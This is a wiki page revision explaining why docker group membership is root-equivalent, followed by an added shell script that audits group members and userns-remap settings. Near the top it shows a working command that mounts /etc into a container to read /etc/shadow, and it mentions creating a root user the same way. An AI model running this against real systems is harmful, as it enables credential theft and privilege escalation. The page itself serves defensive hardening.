Docker security: Difference between revisions
Revision as of 10:50, 4 January 2023
Docker is actually a major security risk on a system where you allow users to start and stop docker containers. A docker container per default runs as root, so a normal user who starts a docker container with a little trickery can compromise system security.
For instance, if I wish to compromise system passwords, I can simply do
<pre>
mike@Server.ttsh.dk:~/docker$ docker run --rm -v /etc:/mnt/etc/ httpd:2.4 cat /mnt/etc/shadow
root:(obfuscated by author)::0:99999:7:::
bin:*:18358:0:99999:7:::
daemon:*:18358:0:99999:7:::
</pre>
It should NEVER be possible for a user to access private files this way; a similar process could be used to create a new root user with a known password, thus elevating a user to root.
Thus you must remember that any member of the "docker" group is, per definition, root on your system.
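Since membership of the "docker" group is equivalent to root, an administrator's first job is to know exactly who is in that group and whether the daemon has been configured to reduce the blast radius. The following audit script is an added example written for this page, not code from the original wiki article. It parses /etc/group-style input to list docker group members, and checks a daemon.json for the userns-remap setting, which maps the container's root to an unprivileged host user. The sample group file, the account names and the sample daemon.json are constructed for the demonstration.

```bash
#!/bin/sh
# Added audit example (not part of the original wiki page).
# Every account listed here is root-equivalent on the host, because it can
# bind-mount any host path into a container that runs as root.

# Print the members of the "docker" group, space separated.
# $1 is either a path to a group file or the group-file text itself
# (the text form is used below with the constructed sample).
docker_group_members() {
    if [ -f "$1" ]; then
        content=$(cat "$1")
    else
        content=$1
    fi
    # /etc/group format: name:password:gid:member,member
    printf '%s\n' "$content" | awk -F: '$1 == "docker" { gsub(",", " ", $4); print $4 }'
}

# Return 0 when the daemon config enables user namespace remapping
# (a non-empty "userns-remap" value), 1 otherwise.
# $1 is a path to daemon.json or its text.
userns_remap_enabled() {
    if [ -f "$1" ]; then
        content=$(cat "$1")
    else
        content=$1
    fi
    printf '%s\n' "$content" | grep -Eq '"userns-remap"[[:space:]]*:[[:space:]]*"[^"]+"'
}

# Emit one warning line per docker group member; always returns 0 so the
# script can be used in a cron job without aborting on findings.
audit_docker_group() {
    members=$(docker_group_members "$1")
    if [ -z "$members" ]; then
        echo "OK: docker group has no members"
        return 0
    fi
    for u in $members; do
        echo "WARNING: $u is in the docker group and is therefore root-equivalent on this host"
    done
    return 0
}

# Constructed sample inputs (hypothetical accounts, not taken from the page).
SAMPLE_GROUP='root:x:0:
docker:x:998:mike,alice
sudo:x:27:mike
users:x:100:'

SAMPLE_GROUP_EMPTY='root:x:0:
docker:x:998:
users:x:100:'

SAMPLE_DAEMON_JSON='{ "userns-remap": "default" }'
SAMPLE_DAEMON_JSON_OFF='{ "log-driver": "json-file" }'

# Stand-alone run against the constructed samples. On a real host use:
#   audit_docker_group /etc/group
#   userns_remap_enabled /etc/docker/daemon.json && echo "userns-remap on"
audit_docker_group "$SAMPLE_GROUP"
if userns_remap_enabled "$SAMPLE_DAEMON_JSON"; then
    echo "userns-remap is enabled: container root maps to an unprivileged host uid"
else
    echo "userns-remap is NOT enabled: container root is host root"
fi
```

Note that userns-remap reduces, but does not remove, the risk: a docker group member can still bind-mount host paths and read anything the remapped uid can read, so the audit of group membership remains the primary control.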